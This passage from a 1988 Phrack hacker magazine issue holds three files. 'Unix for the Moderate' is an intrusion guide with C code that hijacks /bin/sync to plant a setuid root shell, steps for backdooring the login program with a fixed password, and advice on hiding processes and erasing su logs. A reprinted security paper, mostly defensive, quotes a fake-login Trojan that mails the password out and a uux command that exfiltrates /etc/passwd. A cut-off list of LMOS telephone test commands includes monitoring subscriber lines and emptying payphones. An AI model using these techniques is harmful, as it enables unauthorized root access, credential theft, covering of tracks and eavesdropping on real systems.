#EOI

----  cut here  ----

I have covered procfil's fairly extensively as I think it is the most useful
function of Cyber for hackers.  I will be releasing source codes for several
programs including 'the communicator' chat utility, and a BBS program with a
full message base.  If you have any questions about Cyber or you have gotten
into one and don't know what to do, I can be contacted at the Forgotten Realm
BBS or via UUCP mail at ...!uunet!ncoast!ghost.

Phrozen Ghost
===============================================================================


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #6 of 11

------------------------------------------------------------------------------
                            Unix for the Moderate
-------------------------------------------------------------------------------
                By:  The Urvile, Necron 99, and a host of me.
-------------------------------------------------------------------------------

Disclaimer:

   This is mainly for system five.  I do reference BSD occasionally, but I
   mark those.  All those little weird brands (i.e., DEC's Ultrix, Xenix, and
   so on) can go to hell.


Security:  (Improving yours.)

   -Whenever logging onto a system, you should always do the following:
       $ who -u
       $ ps -ef
       $ ps -u root

   or BSD:
       $ who; w; ps uaxg
   This prints out who is on, who is active, what is going on presently,
   everything in the background, and so on.

   And the ever popular:
       $ find / -name "*log*" -print
   This lists out all the files with the name 'log' in it.  If you do find a
   process that is logging what you do, or an odd log file, change it as soon
   as you can.

   If you think someone may be looking at you and you don't want to leave
   (Useful for school computers) then go into something that allows shell
   breaks, or use redirection to your advantage:
       $ cat < /etc/passwd
   That puts 'cat' on the ps, not 'cat /etc/passwd'.

   If you're running a setuid process, and don't want it to show up on a ps
   (Not a very nice thing to have happen), then:
       $ super_shell
       # exec sh
   Runs the setuid shell (super_shell) and puts something 'over' it. You may
   also want to run 'sh' again if you are nervous, because if you break out of
   an exec'ed process, you die.  Neat, huh?


Improving your id:

   -First on, you should issue the command 'id' & it will tell you you your
   uid and euid.  (BSD:  whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your
   id [whoami] and your euid [ls -l].), terribly useful for checking on setuid
   programs to see if you have root euid privs. Also, do this:
       $ find / -perm -4000 -exec /bin/ls -lad {} ";"
   Yes, this finds and does an extended list of all the files that have the
   setuid bit on them, like /bin/login, /bin/passwd, and so on.  If any of
   them look nonstandard, play with them, you never can tell what a ^| will do
   to them sometimes.  Also, if any are writeable and executable, copy sh over
   them, and you'll have a setuid root shell. Just be sure to copy whatever
   was there back, otherwise your stay will probably be shortened a bit.

   -What, you have the bin passwd?

   Well, game over.  You have control of the system.  Everything in the bin
   directory is owned by bin (with the exception of a few things), so you can
   modify them at will.  Since cron executes a few programs as root every once
   in a while, such as /bin/sync, try this:

       main()
          {
               if (getuid()==0 || getuid()==0)        {
                    system("cp /bin/sh /tmp/sroot");
                    system("chmod 4777 /tmp/sroot");  }
               sync();
          }

       $ cc file.c
       $ cp /bin/sync /tmp/sync.old
       $ mv a.out /bin/sync
       $ rm file.c

   Now, as soon as cron runs /bin/sync, you'll have a setuid shell in
   /tmp/sroot.  Feel free to hide it.

   -the 'at' & 'cron' commands:

   Look at the 'at' dir.  Usually /usr/spool/cron/atjobs.  If you can run 'at'
   (check by typing 'at'), and 'lasttimedone' is writable, then: submit a
   blank 'at' job, edit 'lastimedone' to do what you want it to do, and move
   lasttimedone over your entry (like 88.00.00.00).  Then the commands you put
   in lasttimedone will be ran as that file's owner.  Cron:  in
   /usr/spool/cron/cronjobs, there are a list of people running cron jobs.
   Cat root's, and see if he runs any of the programs owned by you (Without
   doing a su xxx -c "xxx").  For matter, check all the crons.  If you can
   take one system login, you should be able to get the rest, in time.

   -The disk files.

   These are rather odd.  If you have read permission on the disks in /dev,
   then you can read any file on the system.  All you have to do is find it in
   there somewhere.  If the disk is writeable, if you use /etc/fsbd, you can
   modify any file on the system into whatever you want, such as by changing
   the permissions on /bin/sh to 4555.  Since this is pretty difficult to
   understand (and I don't get it fully), then I won't bother with it any
   more.

   -Trivial su.

   You know with su you can log into anyone else's account if you know their
   passwords or if you're root.  There are still a number of system 5's that
   have uid 0, null passwd, rsh accounts on them.  Just be sure to remove your
   entry in /usr/adm/sulog.

   -Trojan horses?  On Unix?

   Yes, but because of the shell variable PATH, we are generally out of luck,
   because it usually searches /bin and /usr/bin first.  However, if the first
   field is a colon, files in the present directory are searched first.  Which
   means if you put a modified version of 'ls' there, hey.  If this isn't the
   case, you will have to try something more blatant, like putting it in a
   game (see Shooting Shark's file a while back).  If you have a system login,
   you may be able to get something done like that.  See cron.


Taking over:

   Once you have root privs, you should read all the mail in /usr/mail, just
   to sure nothing interesting is up, or anyone is passing another systems
   passwds about.  You may want to add another entry to the passwd file, but
   that's relatively dangerous to the life of your machine.  Be sure not to
   have anything out of the ordinary as the entry (i.e., No uid 0).

   Get a copy of the login program (available at your nearest decent BBS, I
   hope) of that same version of Unix, and modify it a bit:  on system 5,
   here's a modification pretty common:  in the routine to check correct
   passwds, on the line before the actual pw check, put a if
   (!(strcmp(pswd,"woof"))) return(1); to check for your 'backdoor', enabling
   you to log on as any valid user that isn't uid 0 (On system 5).


Neato things:

   -Have you ever been on a system that you couldn't get root or read the
   Systems/L.sys file?  Well, this is a cheap way to overcome it:  'uuname'
   will list all machines reachable by your Unix, then (Assuming they aren't
   Direct, and the modem is available):
       $ cu -d host.you.want            [or]
       $ uucico -x99 -r1 -shost.you.want
   Both will do about the same for us.  This will fill your screen with lots
   of trivial material, but will eventually get to the point of printing the
   phone number to the other system.  -d enables the cu diagnostics, -x99
   enables the uucico highest debug, and -R1 says 'uucp master'.

   Back a year or two, almost everywhere had their uucp passwd set to the same
   thing as their nuucp passwd (Thanks to the Systems file), so it was a
   breeze getting in.  Even nowadays, some places do it.. You never can tell.

   -Uucp:

   I personally don't like the uucp things.  Uucico and uux are limited by the
   Permissions file, and in most cases, that means you can't do anything
   except get & take from the uucppublic dirs.  Then again, if the
   permission/L.cmd is blank, you should be able to take what files that you
   want.  I still don't like it.

   -Sending mail:

   Sometimes, the mail program checks only the shell var LOGNAME, so change
   it, export it, and you may be able to send mail as anyone.  (Mainly early
   system 5's.)
       $ LOGNAME="root";export LOGNAME

   -Printing out all the files on the system:

   Useful if you're interested in the filenames.
       $ find / -print >file_list&
   And then do a 'grep text file_list' to find any files with 'text' in their
   names.  Like grep [.]c file_list, grep host file_list....

   -Printing out all restricted files:

   Useful when you have root. As a normal user, do:
       $ find / -print >/dev/null&
   This prints out all nonaccessable directories, so become root and see what
   they are hiding.

   -Printing out all the files in a directory:

   Better looking than ls -R:
       $ find . -print
   It starts at the present dir, and goes all the way down.  Catches all
   '.files', too.

   -Rsh:

   Well in the case of having an account with rsh only, check your 'set'.  If
   SHELL is not /bin/sh, and you are able to run anything with a shell escape
   (ex, ed, vi, write, mail...), you should be put into sh if you do a '!sh'.
   If you have write permission on your .profile, change it, because rsh is
   ran after checking profile.

   -Humor:

   On a system 5, do a:
       $ cat "food in cans"

   or on a csh, do:
       % hey unix, got a match?

   Well, I didn't say it was great.


Password hacking:

   -Salt:

   In a standard /etc/passwd file, passwords are 13 characters long.  This is
   an 11 char encrypted passwd and a 2 char encryption modifier (salt), which
   is used to change the des algorithm in one of 4096<?> ways.  Which means
   there is no decent way to go and reverse hack it.  Yet.

   On normal system 5 Unix, passwords are supposed to be 6-8 characters long
   and have both numeric and alphabetic characters in them, which makes a
   dictionary hacker pretty worthless.  However, if a user keeps insisting his
   password is going to be 'dog,' usually the system will comply (depending on
   version).  I have yet to try it, but having the hacker try the normal
   entry, and then the entry terminated by [0-9] is said to have remarkable
   results, if you don't mind the 10-fold increase in time.


Final notes:

   Yes, I have left a lot out.  That seems to be the rage nowadays..  If you
   have noticed something wrong, or didn't like this, feel free to tell me.
   If you can find me.

-------------------------------------------------------------------------------
                    Hi Ho.  Here ends part one.  <Of one?>
-------------------------------------------------------------------------------
                 Produced and directed by: Urvile & Necron 99
----------------------------------------------------------- (c)  ToK inc., 1988


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #7 of 11

                   +--------------------------------------+
                   |     "Unix System Security Issues"    |
                   |              Typed by:               |
                   |               Whisky                 |
                   |         (from Holland, Europe)       |
                   +--------------------------------------+
                   |                 From                 |
                   |            Information Age           |
                   |     Vol. 11, Number 2, April 1988    |
                   |              Written By:             |
                   | Michael J. Knox and Edward D. Bowden |
                   +--------------------------------------+

Note:  This file was sent to me from a friend in Holland. I felt
       that it would be a good idea to present this file to the
       UNIX-hacker community, to show that hackers don't always
       harm systems, but sometimes look for ways to secure flaws
       in existing systems.  -- Jester Sluggo !!

There are a number of elements that have lead to the popularity of the Unix
operating system in the world today.  The most notable factors are its
portability among hardware platforms and the interactive programming
environment that it offers to users.  In fact, these elements have had much to
do with the successful evolution of the Unix system in the commercial market
place. (1, 2)
  As the Unix system expands further into industry and government, the need to
handle Unix system security will no doubt become imperative.  For example, the
US government is committing several million dollars a year for the Unix system
and its supported hardware.  (1) The security requirements for the government
are tremendous, and one can only guess at the future needs of security in
industry.
  In this paper, we will cover some of the more fundamental security risks in
the Unix system.  Discussed are common causes of Unix system compromise in
such areas as file protection, password security, networking and hacker
violations.  In our conclusion, we will comment upon ongoing effects in Unix
system security, and their direct influence on the portability of the Unix
operating system.

FILE AND DIRECTORY SECURITY

In the Unix operating system environment, files and directories are organized
in a tree structure with specific access modes.  The setting of these modes,
through permission bits (as octal digits), is the basis of Unix system
security.  Permission bits determine how users can access files and the type
of access they are allowed.  There are three user access modes for all Unix
system files and directories:  the owner, the group, and others.  Access to
read, write and execute within each of the usertypes is also controlled by
permission bits (Figure 1).  Flexibility in file security is convenient, but
it has been criticized as an area of system security compromise.


                        Permission modes
OWNER                        GROUP                    OTHERS
------------------------------------------------------------
rwx            :             rwx            :         rwx
------------------------------------------------------------
r=read  w=write  x=execute

-rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file
drwx------ 2 sam A1 2 May 01 12:01 directory

FIGURE 1.  File and directory modes:  File shows Bob as the owner, with read
and write permission.  Group has write permission, while Others has read and
execute permission.  The directory gives a secure directory not readable,
writeable, or executable by Group and Others.


  Since the file protection mechanism is so important in the Unix operating
system, it stands to reason that the proper setting of permission bits is
required for overall security.  Aside from user ignorance, the most common
area of file compromise has to do with the default setting of permission bits
at file creation.  In some systems the default is octal 644, meaning that only
the file owner can write and read to a file, while all others can only read
it.  (3) In many "open" environments this may be acceptable.  However, in
cases where sensitive data is present, the access for reading by others should
be turned off. The file utility umask does in fact satisfy this requirement.
A suggested setting, umask 027, would enable all permission for the file
owner, disable write permission to the group, and disable permissions for all
others (octal 750).  By inserting this umask command in a user .profile or
.login file, the default will be overwritten by the new settings at file
creation.
  The CHMOD utility can be used to modify permission settings on files and
directories.  Issuing the following command,

chmod u+rwd,g+rw,g-w,u-rwx file

will provide the file with the same protection as the umask above (octal 750).
Permission bits can be relaxed with chmod at a later time, but at least
initially, the file structure can be made secure using a restrictive umask.
  By responsible application of such utilities as umask and chmod, users can
enhance file system security.  The Unix system, however, restricts the
security defined by the user to only owner, group and others.  Thus, the owner
of the file cannot designate file access to specific users.  As Kowack and
Healy have pointed out, "The granularity of control that (file security)
mechanisms is often insufficient in practice (...) it is not possible to grant
one user write protection to a directory while granting another read
permission to the same directory.  (4) A useful file security file security
extension to the Unix system might be Multics style access control lists.
  With access mode vulnerabilities in mind, users should pay close attention
to files and directories under their control, and correct permissions whenever
possible.  Even with the design limitations in mode granularity, following a
safe approach will ensure a more secure Unix system file structure.

SUID and SGID

The set user id (suid) and set group id (sgid) identify the user and group
ownership of a file.  By setting the suid or sgid permission bits of an
executable file, other users can gain access to the same resources (via the
executable file) as that of the real file's owner.

For Example:

Let Bob's program bob.x be an executable file accessible to others.  When Mary
executes bob.x, Mary becomes the new program owner.  If during program
execution bob.x requests access to file browse.txt, then Mary must have
previous read or write permission to browse.txt.  This would allow Mary and
everyone else total access to the contents of browse.txt, even when she is not
running bob.x.  By turning on the suid bit of bob.x, Mary will have the same
access permissions to browse.txt as does the program's real owner, but she
will only have access to browse.txt during the execution of bob.x.  Hence, by
incorporating suid or sgid, unwelcome browsers will be prevented from
accessing files like browse.txt.

  Although this feature appears to offer substantial access control to Unix
system files, it does have one critical drawback.  There is always the chance
that the superuser (system administrator) may have a writable file for others
that is also set with suid.  With some modification in the file's code (by a
hacker), an executable file like this would enable a user to become a
superuser.  Within a short period of time this violator could completely
compromise system security and make it inaccessible, even to other superusers.
As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by
root is better than knowing the root password".
  To compensate for this security threat, writable suid files should be sought
out and eliminated by the system administrator.  Reporting of such files by
normal users is also essential in correcting existing security breaches.

DIRECTORIES

Directory protection is commonly overlooked component of file security in the
Unix system.  Many system administrators and users are unaware of the fact,
that "publicly writable directories provide the most opportunities for
compromising the Unix system security" (6). Administrators tend to make these
"open" for users to move around and access public files and utilities.  This
can be disastrous, since files and other subdirectories within writable
directories can be moved out and replaced with different versions, even if
contained files are unreadable or unwritable to others.  When this happens, an
unscrupulous user or a "password breaker" may supplant a Trojan horse of a
commonly used system utility (e.g. ls, su, mail and so on).  For example,
imagine

For example:

Imagine that the /bin directory is publicly writable.  The perpetrator could
first remove the old su version (with rm utility) and then include his own
fake su to read the password of users who execute this utility.

  Although writable directories can destroy system integrity, readable ones
can be just as damaging.  Sometimes files and directories are configured to
permit read access by other.  This subtle convenience can lead to unauthorized
disclosure of sensitive data:  a serious matter when valuable information is
lost to a business competitor.
  As a general rule, therefore, read and write access should be removed from
all but system administrative directories.  Execute permission will allow
access to needed files; however, users might explicitly name the file they
wish to use.  This adds some protection to unreadable and unwritable
directories.  So, programs like lp file.x in an unreadable directory /ddr will
print the contents of file.x, while ls/ddr would not list the contents of that
directory.

PATH VARIABLE

PATH is an environment variable that points to a list of directories, which
are searched when a file is requested by a process.  The order of that search
is indicated by the sequence of the listed directories in the PATH name.  This
variable is established at user logon and is set up in the users .profile of
.login file.
  If a user places the current directory as the first entry in PATH, then
programs in the current directory will be run first.  Programs in other
directories with the same name will be ignored.  Although file and directory
access is made easier with a PATH variable set up this way, it may expose the
user to pre-existing Trojan horses.
  To illustrate this, assume that a Trojan horse, similar to the cat utility,
contains an instruction that imparts access privileges to a perpetrator.  The
fake cat is placed in a public directory /usr/his where a user often works.
Now if the user has a PATH variable with the current directory first, and he
enters the cat command while in /usr/his, the fake cat in /usr/his would be
executed but not the system cat located in /bin.
  In order to prevent this kind of system violation, the PATH variable must be
correctly set.  First, if at all possible, exclude the current directory as
the first entry in the PATH variable and type the full path name when invoking
Unix system commands.  This enhances file security, but is more cumbersome to
work with.  Second, if the working directory must be included in the PATH
variable, then it should always be listed last.  In this way, utilities like
vi, cat, su and ls will be executed first from systems directories like /bin
and /usr/bin before searching the user's working directory.

PASSWORD SECURITY

User authentication in the Unix system is accomplished by personal passwords.
Though passwords offer an additional level of security beyond physical
constraints, they lend themselves to the greatest area of computer system
compromise.  Lack of user awareness and responsibility contributes largely to
this form of computer insecurity.  This is true of many computer facilities
where password identification, authentication and authorization are required
for the access of resources - and the Unix operating system is no exception.
  Password information in many time-sharing systems are kept in restricted
files that are not ordinarily readable by users.  The Unix system differs in
this respect, since it allows all users to have read access to the /etc/passwd
file (FIGURE 2) where encrypted passwords and other user information are
stored.  Although the Unix system implements a one-way encryption method, and
in most systems a modified version of the data encryption standard (DES),
password breaking methods are known. Among these methods, brute-force attacks
are generally the least effective, yet techniques involving the use of
heuristics (good guesses and knowledge about passwords) tend to be successful.
For example, the /etc/passwd file contains such useful information as the
login name and comments fields.  Login names are especially rewarding to the
"password breaker" since many users will use login variants for passwords
(backward spelling, the appending of a single digit etc.).  The comment field
often contains items such as surname, given name, address, telephone number,
project name and so on.  To quote Morris and Grampp (7) in their landmark
paper on Unix system security:

  [in the case of logins]

  The authors made a survey of several dozen local machines, using as trial
  passwords a collection of the 20 most common female first names, each
  followed by a single digit.  The total number of passwords tried was,
  therefore, 200.  At least one of these 200 passwords turned out to be a
  valid password on every machine surveyed.

  [as for comment fields]

  (...) if an intruder knows something about the people using a machine, a
  whole new set of candidates is available.  Family and friend's names, auto
  registration numbers, hobbies, and pets are particularly productive
  categories to try interactively in the unlikely event that a purely
  mechanical scan of the password file turns out to be disappointing.

Thus, given a persistent system violator, there is a strong evidence, that he
will find some information about users in the /etc/passwd file. With this in
mind, it is obvious that a password file should be unreadable to everyone
except those in charge of system administration.


root:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/:/bin
mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin

FIGURE 2.  The /etc/passwd file.  Note the comments field as underlined terms.


  Resolution of the /etc/passwd file's readability does not entirely solve the
basic problem with passwords.  Educating users and administrators is necessary
to assure proper password utilization. First, "good passwords are those that
are at least six characters long, aren't based on personal information, and
have some non-alphabetic (especially control) characters in them:  4score,
my_name, luv2run" (8).  Secondly, passwords should be changed periodically but
users should avoid alternating between two passwords.  Different passwords for
different machines and files will aid in protecting sensitive information.
Finally, passwords should never be available to unauthorized users. Reduction
of user ignorance about poor password choice will inevitably make a system
more secure.

NETWORK SECURITY

UUCP system
The most common Unix system network is the UUCP system, which is a group of
programs that perform the file transfers and command execution between remote
systems.  (3) The problem with the UUCP system is that users on the network
may access other users' files without access permission.  As stated by Nowitz
(9),

  The uucp system, left unrestricted, will let any outside user execute
  commands and copy in/out any file that is readable/writable by a uucp login
  user.  It is up to the individual sites to be aware of this, and apply the
  protections that they feel free are necessary.

This emphasizes the importance of proper implementation by the system
administrator.
  There are four UUCP system commands to consider when looking into network
security with the Unix system.  The first is uucp, a command used to copy
files between two Unix systems.  If uucp is not properly implemented by the
system administrator, any outside user can execute remote commands and copy
files from another login user.  If the file name on another system is known,
one could use the uucp command to copy files from that system to their system.
For example:

  %uucp system2!/main/src/hisfile myfile

will copy hisfile from system2 in the directory /main/src to the file myfile
in the current local directory.  If file transfer restrictions exist on either
system, hisfile would not be sent.  If there are no restrictions, any file
could be copied from a remote user - including the password file.  The
following would copy the remote system /etc/passwd file to the local file
thanks:

  %uucp system2!/etc/passwd thanks

System administrators can address the uucp matter by restricting uucp file
transfers to the directory /user/spool/uucppublic.  (8) If one tries to
transfer a file anywhere else, a message will be returned saying "remote
access to path/file denied" and no file transfer will occur.
  The second UUCP system command to consider is the uux.  Its function is to
execute commands on remote Unix computers.  This is called remote command
execution and is most often used to send mail between systems (mail executes
the uux command internally).
  The ability to execute a command on another system introduces a serious
security problem if remote command execution is not limited.  As an example, a
system should not allow users from another system to perform the following:

  %uux "system1!cat</etc/passwd>/usr/spool/uucppublic"

which would cause system1 to send its /etc/passwd file to the system2 uucp
public directory.  The user of system2 would now have access to the password
file.  Therefore, only a few commands should be allowed to execute remotely.
Often the only command allowed to run uux is rmail, the restricted mail
program.
  The third UUCP system function is the uucico (copy in / copy out) program.
It performs the true communication work.  Uucp or uux does not actually call
up other systems; instead they are queued and the uucico program initiates the
remote processes.  The uucico program uses the file /usr/uucp/USERFILE to
determine what files a remote system may send or receive.  Checks for legal
files are the basis for security in USERFILE.  Thus the system administrator
should carefully control this file.
  In addition, USERFILE controls security between two Unix systems by allowing
a call-back flag to be set.  Therefore, some degree of security can be
achieved by requiring a system to check if the remote system is legal before a
call-back occurs.
  The last UUCP function is the uuxqt.  It controls the remote command
execution.  The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine
which commands will run in response to a remote execution request.  For
example, if one wishes to use the electronic mail feature, then the L.cmd file
will contain the line rmail.  Since uuxqt determines what commands will be
allowed to execute remotely, commands which may compromise system security
should not be included in L.cmd.

CALL THE UNIX SYSTEM

In addition to UUCP network commands, one should also be cautious of the cu
command (call the Unix system).  Cu permits a remote user to call another
computer system.  The problem with cu is that a user on a system with a weak
security can use cu to connect to a more secure system and then install a
Trojan horse on the stronger system.  It is apparent that cu should not be
used to go from a weaker system to a stronger one, and it is up to the system
administrator to ensure that this never occurs.

LOCAL AREA NETWORKS

With the increased number of computers operating under the Unix system, some
consideration must be given to local area networks (LANs).  Because LANs are
designed to transmit files between computers quickly, security has not been a
priority with many LANs, but there are secure LANs under development.  It is
the job of the system manager to investigate security risks when employing
LANs.

OTHER AREAS OF COMPROMISE

There are numerous methods used by hackers to gain entry into computer
systems.  In the Unix system, Trojan horses, spoofs and suids are the primary
weapons used by trespassers.
  Trojan horses are pieces of code or shell scripts which usually assume the
role of a common utility but when activated by an unsuspecting user performs
some unexpected task for the trespasser.  Among the many different Trojan
horses, it is the su masquerade that is the most dangerous to the Unix system.
  Recall that the /etc/passwd file is readable to others, and also contains
information about all users - even root users.  Consider what a hacker could
do if he were able to read this file and locate a root user with a writable
directory.  He might easily plant a fake su that would send the root password
back to the hacker.  A Trojan horse similar to this can often be avoided when
various security measures are followed, that is, an etc/passwd file with
limited read access, controlling writable directories, and the PATH variable
properly set.
  A spoof is basically a hoax that causes an unsuspecting victim to believe
that a masquerading computer function is actually a real system operation.  A
very popular spool in many computer systems is the terminal-login trap.  By
displaying a phoney login format, a hacker is able to capture the user's
password.
  Imagine that a root user has temporarily deserted his terminal.  A hacker
could quickly install a login process like the one described by Morris and
Grampp (7):

  echo -n "login:"
  read X
  stty -echo
  echo -n "password:"
  read Y
  echo ""
  stty echo
  echo %X%Y|mail outside|hacker&
  sleep 1
  echo Login incorrect
  stty 0>/dev/tty

We see that the password of the root user is mailed to the hacker who has
completely compromised the Unix system.  The fake terminal-login acts as if
the user has incorrectly entered the password.  It then transfers control over
to the stty process, thereby leaving no trace of its existence.
  Prevention of spoofs, like most security hazards, must begin with user
education.  But an immediate solution to security is sometimes needed before
education can be effected.  As for terminal-login spoofs, there are some
keyboard-locking programs that protect the login session while users are away
from their terminals.  (8, 10) These locked programs ignore keyboard-generated
interrupts and wait for the user to enter a password to resume the terminal
session.
  Since the suid mode has been previously examined in the password section, we
merely indicate some suid solutions here.  First, suid programs should be used
is there are no other alternatives.  Unrestrained suids or sgids can lead to
system compromise.  Second, a "restricted shell" should be given to a process
that escapes from a suid process to a child process.  The reason for this is
that a nonprivileged child process might inherit privileged files from its
parents.  Finally, suid files should be writable only by their owners,
otherwise others may have access to overwrite the file contents.
  It can be seen that by applying some basic security principles, a user can
avoid Trojan horses, spoofs and inappropriate suids.  There are several other
techniques used by hackers to compromise system security, but the use of good
judgement and user education may go far in preventing their occurrence.

CONCLUSION

Throughout this paper we have discussed conventional approaches to Unix system
security by way of practical file management, password protection, and
networking.  While it can be argued that user education is paramount in
maintaining Unix system security (11) factors in human error will promote some
degree of system insecurity.  Advances in protection mechanisms through
better-written software (12), centralized password control (13) and
identification devices may result in enhanced Unix system security.
  The question now asked applies to the future of Unix system operating.  Can
existing Unix systems accommodate the security requirements of government and
industry? It appears not, at least for governmental security projects.  By
following the Orange Book (14), a government graded classification of secure
computer systems, the Unix system is only as secure as the C1 criterion.  A C1
system, which has a low security rating (D being the lowest) provides only
discretionary security protection (DSP) against browsers or non-programmer
users. Clearly this is insufficient as far as defense or proprietary security
is concerned.  What is needed are fundamental changes to the Unix security
system.  This has been recognized by at least three companies, AT&T, Gould and
Honeywell (15, 16, 17).  Gould, in particular, has made vital changes to the
kernel and file system in order to produce a C2 rated Unix operating system.
To achieve this, however, they have had to sacrifice some of the portability
of the Unix system.  It is hoped that in the near future a Unix system with an
A1 classification will be realized, though not at the expense of losing its
valued portability.

REFERENCES

1  Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 8 (1986)
   pp 50-63
2  Waite, M et al. "Unix system V primer" USA (1984)
3  Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113-128
4  Kowack, G and Healy, D "Can the holes be plugged?" Computerworld
   Vol 18 (26 September 1984) pp 27-28
5  Farrow, R "Security issues and strategies for users" Unix/World
   (April 1986) pp 65-71
6  Farrow, R "Security for superusers, or how to break the Unix system"
   Unix/World (May 1986) pp 65-70
7  Grampp, F T and Morris, R H "Unix operating system security" AT&T Bell
   Lab Tech. J. Vol 63 No 8 (1984) pp 1649-1672
8  Wood, P H and Kochan, S G "Unix system security" USA (1985)
9  Nowitz, D A "UUCP Implementation description:  Unix programmer's manual
   Sec. 2" AT&T Bell Laboratories, USA (1984)
10 Thomas, R "Securing your terminal: two approaches" Unix/World
   (April 1986) pp 73-76
11 Karpinski, D "Security round table (Part 1)" Unix Review
   (October 1984) p 48
12 Karpinski, D "Security round table (Part 2)" Unix Review
   (October 1984) p 48
13 Lobel, J "Foiling the system breakers:  computer security and access
   control" McGraw-Hill, USA (1986)
14 National Computer Security Center "Department of Defense trusted
   computer system evaluation criteria" CSC-STD-001-83, USA (1983)
15 Stewart, F "Implementing security under Unix" Systems&Software
   (February 1986)
16 Schaffer, M and Walsh, G "Lock/ix:  An implementation of Unix for the
   Lock TCB" Proceedings of USENIX (1988)
17 Chuck, F "AT&T System 5/MLS Product 14 Strategy" AT&T Bell Labs,
   Government System Division, USA (August 1987)
==============================================================================


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #8 of 11

                                  Control C

                                     and

                    The Tribunal of Knowledge presents...

                   LMOS (Loop Maintenance Operation System)

                             -A List of Commands-

    This file contains what to our knowledge are the best things to do on
LMOS.  We were really vague due to the great power of the information provided
in this file.  You now know the commands so we will not go into (either in
this file or when talking to us) how to use this information, it is up to you
to figure out how to use it.

+:  Increase the voice volume on a line

+ lets you increase the volume when you are talking on or monitoring a
sub-scriber's line over a callback path.  The volume is increased because MLT
adds amplifier to the line.  + may be used after a mon, talk, rev, talkin or
call request.  Sometimes MLT adds an amplifier automatically to a long line.
You will not know it is there so if you try to add amplification, a + will
appear in the status sections but the voices will not get any louder because
they are already loud as possible.

-:  Decrease the voice volume on a line

- lets you decrease the volume when you are talking on or monitoring a
subscriber's line over a callback path.  The volume is decreased because MLT
removes amplifier from the line.  - may be used to remove amplifier that you
have placed on the line with the + request, or amplifier that MLT has
automatically places on a long line.  The main reason to remove the amplifier
is because it can sometimes cause a shrill or howl.

Call:  Make a call on a subscriber's line

Call lets you use your touch-tone pad to dial any number you want using the
customer's line circuit.  It does this by simulating an off-hook condition in
order to draw dial tone.  A callback number is a required entry on the tv mask
and an mdf access is required for calling out (except in SXS and panel
offices).  You can use a call when:  1) You want to know the TN for a known CA
& PR - you would call TSPS or ANI.  2) Calls cannot be completed to a TN - you
would call that TN.  3) To monitor dial tone on a customer's line.

Callrd:  Make a call on a dial pulse line circuit

Callrd lets you use your touch-tone pad to dial using the customer's rotary
dial line circuit.  MLT does this by translating tones on a customer's line.
mdf access is required for calling out (except in SXS, DMS10, DMS100, and
DMS100AC offices).  Use a callrd if you want to know the TN for a known CA &
PR - you would call TSPS or ANI.

Ccol:  Collect coins using coin relay

Ccol attempts to collect any coins that are in the hopper of a coin telephone
set by operating the coin relay.  Ccol does not check the totalizer or check
the rest of the line.  The results tell you only about relay operation, speed,
and the current that is necessary to operate it.  A ver code is not returned
by ccol.  You must have access to the line before your request ccol.  You will
use ccol most often when you are talking to a repair person who is trying to
fix a coin phone.

Channel:  Run enhanced channel tests on DLC lines

Chan or channel runs channel isolation tests and tells you if you have a bad
COT or RT channel unit.  Use this request to run enhanced channel tests on
lines served by digital loop carriers such as SLC Series 5.  Chan can only be
run if there is special equipment in the co you're testing in.  If you are
testing a non-locally switched line with the SSA request, channel tests must
be run separately with this request.  Chan may also be used to run channel
isolation tests on switched lines from the tv or stv mask, but these tests are
included when you do a full or loop on a switched line.

Change:  Change status information

Change allows you to change cable, pair or comment information that is
displayed without having to request a test or any other type of information.
the permanent line record information is not changed.  To request a change,
enter "change" in the req field of the tv and enter the change of information.

Chome:  Home totalizer on a coin telephone

Chome attempts to return a totalizer to the starting position (home) for
counting coins.  The totalizer counts the coins and sends a tone back to the
co for every 5 cents deposited.  If it is not homed, coins can't be deposited.
A chome request tells you whether the totalizer was homed, how many tones were
sent to the co, and the current that was used to home the totalizer.  A line
must already be accessed to request a chome.  Chome is often used when a
repair person is trying to fix a coin telephone.

Co:  Test the central office equipment

Co initiates a series of tests on the subscriber's line circuit.  Co can be
requested using either a no-test or an MDF trunk.  A no-test access connects
you to the entire loop but a co request tests only the inside portion.  An MDF
access is only connected to the inside portion of the loop.  The outside
portion is physically disconnected.  Use a no-test access when you are fairly
sure the trouble is inside the central office.  Use a co on an MDF access when
you are not sure where the trouble is.

Coin:  Test a coin telephone set

Coin initiates a full series of tests on a telephone line.  The station set,
the totalizer, the coin relay, the loop and the co equipment are checked.  If
the coin request finds something wrong with either the totalizer or the relay,
it stops testing and tells you the trouble is in the set.  If it finds nothing
wrong, it runs the full entries of tests.  Coin may be used when a repair
person is trying to fix a coin telephone.  If a coin phone is newly installed,
coin will check the set even though there is no line record.

Cret:  Operate coin relay to return coins

Cret attempts to return any coins that may be lodged in the hopper of a coin
telephone set.  It operates the coin relay so that it will return the coins.
It tries to return them 3 times before giving up.  If it is successful, it
also checks the speed of the relay.  It does not check the totalizer or the
rest of the line.  You should have access to the line before you request a
cret.  You will use cret primarily when you are talking to a repair person who
is trying to repair coin telephone.

Cset:  Check totalizer and relay in coinset

Cset checks the totalizer and the coin relay in a coin telephone set.  The
totalizer is the mechanism in the phone that counts deposited coins and sends
a tone back to the co for every 5 cents that is deposited.  The relay is the
mechanism that either returns or collects the coins that are deposited.  Cset
does not check the co or loop parts of the line.  Cset can be used when you
are talking to a repair person who is fixing a coin telephone.

Dial:  Test a subscriber's rotary dial

Dial checks the subscriber's rotary dial.  You must be in contact with the
subscriber,either over a callback path or over a ddd line.  For the dial
request to work correctly, tell the subscriber to dial a "0" after hearing
brief dial tone.  The results of a dial request tell you whether the dial is
okay or not, whether the dial speed is okay and what the speed is, and whether
the break is okay and what the break is.  Use the dial request when you
suspect a problem with the telephone set.  The trouble report could be "Can't
call out' or 'Gets wrong numbers", for example.

Dtout:  Test a pbx line circuit

Dtout initiates a series of tests on a pbx line circuit.  Dtout must be
requested using an MDF trunk.  It is used to draw dial tone and check the
